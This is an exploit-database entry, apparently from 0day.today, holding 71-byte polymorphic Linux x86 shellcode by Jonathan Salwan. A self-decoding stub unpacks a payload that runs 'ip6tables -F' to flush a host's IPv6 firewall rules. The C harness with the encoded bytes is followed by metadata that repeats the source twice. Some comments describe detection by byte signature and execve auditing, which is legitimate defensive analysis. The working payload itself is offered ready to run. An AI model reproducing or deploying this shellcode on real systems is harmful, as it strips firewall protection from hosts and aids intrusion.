ID 1337DAY-ID-10169
Type zdt
Reporter Jonathan Salwan
Modified 2010-01-24T00:00:00
Description
Exploit for linux/x86 platform in category shellcode
=======================================================
linux/x86 polymorphic shellcode ip6tables -F - 71 bytes
=======================================================
/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes
* Jonathan Salwan
*
*
* The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org
*
* Disassembly of section .text (the decoded payload; shellcode[] below stores it encoded, behind a decoder stub):
*
* 08048054 <.text>:
* 8048054: 6a 0b push $0xb
* 8048056: 58 pop %eax
* 8048057: 99 cltd
* 8048058: 52 push %edx
* 8048059: 66 68 2d 46 pushw $0x462d
* 804805d: 89 e1 mov %esp,%ecx
* 804805f: 52 push %edx
* 8048060: 6a 73 push $0x73
* 8048062: 66 68 6c 65 pushw $0x656c
* 8048066: 68 36 74 61 62 push $0x62617436
* 804806b: 68 6e 2f 69 70 push $0x70692f6e
* 8048070: 68 2f 73 62 69 push $0x6962732f
* 8048075: 68 2f 75 73 72 push $0x7273752f
* 804807a: 89 e3 mov %esp,%ebx
* 804807c: 52 push %edx
* 804807d: 51 push %ecx
* 804807e: 53 push %ebx
* 804807f: 89 e1 mov %esp,%ecx
* 8048081: cd 80 int $0x80
*/
#include <stdio.h>
/*
 * Test harness for the sample: prints the byte count of shellcode[] and then
 * calls the array as if it were a function. argc and argv are not used.
 *
 * Layout of shellcode[] (71 bytes plus the terminating NUL):
 *   - bytes 0..23:  decoder stub. It obtains its own address with a
 *                   jmp/call/pop sequence, subtracts 1 from the bytes that
 *                   follow it, in place, and then jumps into them.
 *   - bytes 24..70: the 47-byte payload shown in the header disassembly,
 *                   stored with every byte incremented by 1
 *                   (0x6a -> 0x6b, 0x0b -> 0x0c, ... 0xcd 0x80 -> 0xce 0x81).
 *
 * Decoded payload, per the header disassembly: eax = 0xb (execve on 32-bit
 * Linux, entered through int $0x80), path "/usr/sbin/ip6tables",
 * argv = { path, "-F" }, envp = NULL. ip6tables -F flushes the chains of the
 * default (filter) table, so the visible effect is a host left without its
 * IPv6 filter rules; the command needs network-admin privileges to succeed.
 *
 * Defender notes:
 *   - The encoding is a fixed add-1 with a constant stub, so the stub bytes
 *     and the encoded body are stable and can be matched by byte signature.
 *   - The observable event is an execve of /usr/sbin/ip6tables with "-F"
 *     and an empty environment; process-execution auditing that records
 *     argv and the parent process is the natural place to alert on it.
 */
int main(int argc, char *argv[])
{
/* Decoder stub (first three lines, 24 bytes); must stay in front of the body. */
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x47\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
/* Encoded payload (47 bytes): each byte is the disassembled byte plus 1. */
"\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
"\x47\x8a\xe2\x53\x6b\x74\x67\x69"
"\x6d\x66\x69\x37\x75\x62\x63\x69"
"\x6f\x30\x6a\x71\x69\x30\x74\x63"
"\x6a\x69\x30\x76\x74\x73\x8a\xe4"
"\x53\x52\x54\x8a\xe2\xce\x81";
/*
 * The array holds no 0x00 byte before its terminator, so strlen() counts all
 * 71 bytes. NOTE(review): strlen() returns size_t but the format is %d, and
 * the listing includes only <stdio.h>, so strlen() has no prototype in scope.
 */
fprintf(stdout,"Length: %d\n",strlen(shellcode));
/*
 * Casts the array to a function pointer and calls it. shellcode[] is a local
 * (stack) object that the stub rewrites in place, so the bytes must be both
 * writable and executable; where the stack is mapped non-executable (NX/W^X)
 * this call faults instead of running them. If the execve succeeds the
 * process image is replaced and control does not come back here.
 */
(*(void(*)()) shellcode)();
}
{"id": "1337DAY-ID-10169", "bulletinFamily": "exploit", "title": "linux/x86 polymorphic shellcode ip6tables -F - 71 bytes", "description": "Exploit for linux/x86 platform in category shellcode", "published": "2010-01-24T00:00:00", "modified": "2010-01-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/10169", "reporter": "Jonathan Salwan", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-01-06T05:03:03", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T02:22:44", "value": 4.6}}, "hash": "95866b7e046a528b1f86d48a6510374681ce5a867dce8fdc944fbca2221ec38d", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "43b999db931eb702e36797d4c6ba3fa5", "key": "href"}, {"hash": "dd05701473954345b45a2fbf9864fc0f", "key": "title"}, {"hash": "76f6e2f1cc9bad8db927b1cafd3e1b21", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "modified"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "fa25d682ad8a858d1dd2b72d7aaca6ce", "key": "description"}, {"hash": "f986fd3d4bc29d02e231586e9010a5b0", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "42cd2e2f0d828285022375c8bc5c4c15", "key": "sourceData"}], "history": [], "href": "http://0day.today/exploit/description/10169", "id": "1337DAY-ID-10169", "lastseen": "2016-04-20T02:22:44", "modified": "2010-01-24T00:00:00", "objectVersion": "1.0", "published": "2010-01-24T00:00:00", "references": [], "reporter": "Jonathan Salwan", "sourceData": 
"=======================================================\r\nlinux/x86 polymorphic shellcode ip6tables -F - 71 bytes\r\n=======================================================\r\n\r\n\r\n/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes\r\n * Jonathan Salwan \r\n *\r\n *\r\n * The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org\r\n *\r\n * Disassembly of section .text:\r\n *\r\n * 08048054 <.text>:\r\n * 8048054: 6a 0b push $0xb\r\n * 8048056: 58 pop %eax\r\n * 8048057: 99 cltd \r\n * 8048058: 52 push %edx\r\n * 8048059: 66 68 2d 46 pushw $0x462d\r\n * 804805d: 89 e1 mov %esp,%ecx\r\n * 804805f: 52 push %edx\r\n * 8048060: 6a 73 push $0x73\r\n * 8048062: 66 68 6c 65 pushw $0x656c\r\n * 8048066: 68 36 74 61 62 push $0x62617436\r\n * 804806b: 68 6e 2f 69 70 push $0x70692f6e\r\n * 8048070: 68 2f 73 62 69 push $0x6962732f\r\n * 8048075: 68 2f 75 73 72 push $0x7273752f\r\n * 804807a: 89 e3 mov %esp,%ebx\r\n * 804807c: 52 push %edx\r\n * 804807d: 51 push %ecx\r\n * 804807e: 53 push %ebx\r\n * 804807f: 89 e1 mov %esp,%ecx\r\n * 8048081: cd 80 int $0x80\r\n*/\r\n \r\n#include <stdio.h>\r\n \r\nint main(int argc, char *argv[])\r\n{\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x47\\x80\"\r\n \"\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\"\r\n \"\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\"\r\n \"\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\"\r\n \"\\x47\\x8a\\xe2\\x53\\x6b\\x74\\x67\\x69\"\r\n \"\\x6d\\x66\\x69\\x37\\x75\\x62\\x63\\x69\"\r\n \"\\x6f\\x30\\x6a\\x71\\x69\\x30\\x74\\x63\"\r\n \"\\x6a\\x69\\x30\\x76\\x74\\x73\\x8a\\xe4\"\r\n \"\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81\";\r\n \r\n fprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/10169", "title": "linux/x86 polymorphic shellcode ip6tables -F - 71 bytes", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": 
"2016-04-20T02:22:44"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "fa25d682ad8a858d1dd2b72d7aaca6ce"}, {"key": "href", "hash": "7d53f22a2f6915ea24e8585318961447"}, {"key": "modified", "hash": "12d6e97db87bdeb61f135d436bbfd6a0"}, {"key": "published", "hash": "12d6e97db87bdeb61f135d436bbfd6a0"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "76f6e2f1cc9bad8db927b1cafd3e1b21"}, {"key": "sourceData", "hash": "806ca1f4628c431eb4589f616b68ce98"}, {"key": "sourceHref", "hash": "7cd748f18e12e0cf62fbe06033644a9d"}, {"key": "title", "hash": "dd05701473954345b45a2fbf9864fc0f"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "ddb7946c64ead789a658ff56deb4b6395928b5cd2ee357fd1bb58b1755bcf2d4", "viewCount": 0, "enchantments": {"vulnersScore": 5.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/10169", "sourceData": "=======================================================\r\nlinux/x86 polymorphic shellcode ip6tables -F - 71 bytes\r\n=======================================================\r\n\r\n\r\n/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes\r\n * Jonathan Salwan \r\n *\r\n *\r\n * The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org\r\n *\r\n * Disassembly of section .text:\r\n *\r\n * 08048054 <.text>:\r\n * 8048054: 6a 0b push $0xb\r\n * 8048056: 58 pop %eax\r\n * 8048057: 99 cltd \r\n * 8048058: 52 push %edx\r\n * 8048059: 66 68 2d 46 pushw $0x462d\r\n * 804805d: 89 e1 mov %esp,%ecx\r\n * 804805f: 52 push %edx\r\n * 8048060: 6a 73 push $0x73\r\n * 8048062: 66 68 6c 65 pushw $0x656c\r\n * 8048066: 68 36 74 61 62 push $0x62617436\r\n * 804806b: 68 6e 2f 69 70 push $0x70692f6e\r\n * 8048070: 68 2f 73 62 69 push $0x6962732f\r\n * 8048075: 68 2f 75 73 72 
push $0x7273752f\r\n * 804807a: 89 e3 mov %esp,%ebx\r\n * 804807c: 52 push %edx\r\n * 804807d: 51 push %ecx\r\n * 804807e: 53 push %ebx\r\n * 804807f: 89 e1 mov %esp,%ecx\r\n * 8048081: cd 80 int $0x80\r\n*/\r\n \r\n#include <stdio.h>\r\n \r\nint main(int argc, char *argv[])\r\n{\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x47\\x80\"\r\n \"\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\"\r\n \"\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\"\r\n \"\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\"\r\n \"\\x47\\x8a\\xe2\\x53\\x6b\\x74\\x67\\x69\"\r\n \"\\x6d\\x66\\x69\\x37\\x75\\x62\\x63\\x69\"\r\n \"\\x6f\\x30\\x6a\\x71\\x69\\x30\\x74\\x63\"\r\n \"\\x6a\\x69\\x30\\x76\\x74\\x73\\x8a\\xe4\"\r\n \"\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81\";\r\n \r\n fprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-06] #"}
{"result": {}}